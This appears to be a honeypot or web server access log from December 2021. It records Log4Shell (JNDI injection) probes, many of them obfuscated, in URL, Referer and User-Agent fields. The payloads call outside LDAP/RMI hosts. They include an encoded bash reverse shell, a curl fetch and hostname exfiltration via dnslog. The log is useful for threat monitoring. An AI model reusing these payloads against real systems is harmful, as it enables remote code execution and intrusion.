    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Bupper%3An%7D%24%7Blower%3Ad%7D%24%7Bupper%3Ai%7D%3A%24%7
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}

2021-12-20 162.241.92.70
    URL: GET /
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}

2021-12-20 162.241.92.70
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F188.166.57.35%3A1389%2FBina
    Referer: ${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 162.241.92.70
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 200.98.163.133
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-20 200.98.163.133
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-20 200.98.163.133
    URL: GET /
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-20 200.98.163.133
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-20 200.98.163.133
    URL: GET /
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-20 200.98.163.133
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-20 200.98.163.133
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}$::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-20 200.98.163.133
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}$::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-20 94.177.189.191
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-20 94.177.189.191
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-20 94.177.189.191
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-20 94.177.189.191
    URL: GET /
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-20 178.62.23.161
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://188.166.57.35:1389/Binary}

2021-12-20 178.62.23.161
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://188.166.57.35:1389/Binary}

2021-12-20 178.62.23.161
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Bupper%3An%7D%24%7Blower%3Ad%7D%24%7Bupper%3Ai%7D%3A%24%7
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}

2021-12-20 178.62.23.161
    URL: GET /
    Referer: ${${lower:j}${upper:n}$lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}

2021-12-20 89.66.154.168
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 89.66.154.168
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 89.66.154.168
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 89.66.154.168
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 181.27.126.77
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F188.166.57.35%3A1389%2FBina
    Referer: ${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 181.27.126.77
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F188.166.57.35%3A1389%2FBina
    Referer: ${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 172.104.181.39
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 172.104.181.39
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 172.104.181.39
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 172.104.181.39
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 89.29.244.225
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-19 89.29.244.225
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-19 89.29.244.225
    URL: GET /
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-19 89.29.244.225
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 89.29.244.225
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 89.29.244.225
    URL: GET /
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-19 89.29.244.225
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 89.29.244.225
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 210.18.138.230
    URL: GET /
    Referer: ${jndi:ldap://172.105.34.103:1389/a}
    User Agent: ${jndi:ldap://172.105.34.103:1389/a}

2021-12-19 210.18.138.230
    URL: GET /
    Referer: ${jndi:ldap://172.105.34.103:1389/a}
    User Agent: ${jndi:ldap://172.105.34.103:1389/a}

2021-12-19 210.18.138.230
    URL: GET /
    Referer: ${jndi:ldap://172.105.34.103:1389/a}
    User Agent: ${jndi:ldap://172.105.34.103:1389/a}

2021-12-19 210.18.138.230
    URL: GET /
    Referer: ${jndi:ldap://172.105.34.103:1389/a}
    User Agent: ${jndi:ldap://172.105.34.103:1389/a}

2021-12-19 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-19 51.79.77.75
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F188.166.57
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 51.79.77.75
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F188.166.57
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 51.79.77.75
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 51.79.77.75
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 51.79.77.75
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 51.79.77.75
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 51.79.77.75
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 51.79.77.75
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 51.79.77.75
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F188.166.57
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 51.79.77.75
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 51.79.77.75
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 51.79.77.75
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 159.89.188.81
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 159.89.188.81
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 159.89.188.81
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 159.89.188.81
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-19 159.89.188.81
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-19 159.89.188.81
    URL: GET /
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-19 159.89.188.81
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-19 159.89.188.81
    URL: GET /
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-19 62.171.179.103
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 62.171.179.103
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 62.171.179.103
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F188.166.57.35%3A1389%2FBina
    Referer: ${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 62.171.179.103
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-19 74.208.22.204
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-19 74.208.22.204
    URL: GET /
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-19 74.208.22.204
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://188.166.57.35:1389/Binary}

2021-12-19 74.208.22.204
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://188.166.57.35:1389/Binary}

2021-12-19 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.253:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-19 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-19 195.54.160.149
    URL: GET /
    Referer: http://140.82.47.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-19 195.54.160.149
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-18 37.59.145.117
    URL: GET /
    Referer: ${jndi:ldap://37.59.145.117:1389/YmFzaCAtaSA+JiAvZGV2L3RjcC8zNy41OS4xNDUuMTE3LzQ1Njk2IDA+JjE=}
    User Agent: Trying

2021-12-18 37.59.145.117
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://37.59.145.117:1389/YmFzaCAtaSA+JiAvZGV2L3RjcC8zNy41OS4xNDUuMTE3LzQ1Njk2IDA+JjE=}

2021-12-18 195.54.160.149
    URL: GET /login
    Referer: http://a.b.c.e:80/dashboard
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-18 210.18.138.230
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://210.18.138.230:1389/a}

2021-12-18 210.18.138.230
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://210.18.138.230:1389/a}

2021-12-18 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-18 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-18 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-18 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-18 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.253:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-18 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-18 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.10:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1Lj
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-18 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.9:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-18 80.89.74.74
    URL: GET /dnsovertls
    Referer: -
    User Agent: ${jndi:ldap://${sys:java.version}-op-${hostName}.bg8s5c.dnslog.cn/a}

2021-12-18 80.89.74.74
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://${sys:java.version}-op-${hostName}.bg8s5c.dnslog.cn/a}

2021-12-18 37.59.145.117
    URL: GET /
    Referer: ${jndi:ldap://37.59.145.117:1389/YmFzaCAtaSA+JiAvZGV2L3RjcC8zNy41OS4xNDUuMTE3LzQ1Njk2IDA+JjE=}
    User Agent: Trying

2021-12-18 37.59.145.117
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://37.59.145.117:1389/YmFzaCAtaSA+JiAvZGV2L3RjcC8zNy41OS4xNDUuMTE3LzQ1Njk2IDA+JjE=}

2021-12-18 195.54.160.149
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-18 195.54.160.149
    URL: GET /
    Referer: http://140.82.47.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-18 195.54.160.149
    URL: GET /
    Referer: http://x.y.169.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-17 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-17 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-17 195.54.160.149
    URL: GET /
    Referer: http://140.82.47.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-17 195.54.160.149
    URL: GET /login
    Referer: http://a.b.c.e:80/dashboard
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-17 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-17 195.54.160.149
    URL: GET /
    Referer: http://a.b.c.d:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-17 195.54.160.149
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-17 195.54.160.149
    URL: GET /
    Referer: http://x.y.169.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-17 37.59.145.117
    URL: GET /?v=%24%7Bjndi%3Aldap%3A%2F%2F45.33.5.105.c6y2trk2vtc00005ghfggdxbpceyyyyyb.interact.sh%2F
    Referer: https://${jndi:ldap://45.33.5.105.c6y2trk2vtc00005ghfggdxbpceyyyyyb.interact.sh/65ue5i6}
    User Agent: ${jndi:ldap://45.33.5.105.c6y2trk2vtc00005ghfggdxbpceyyyyyb.interact.sh/65ue5i6}

2021-12-17 37.59.145.117
    URL: GET /?v=%24%7Bjndi%3Aldap%3A%2F%2F45.33.5.105.c6y2trk2vtc00005ghfggdxbpceyyyyyb.interact.sh%2F
    Referer: https://${jndi:ldap://45.33.5.105.c6y2trk2vtc00005ghfggdxbpceyyyyyb.interact.sh/65ue5i6}
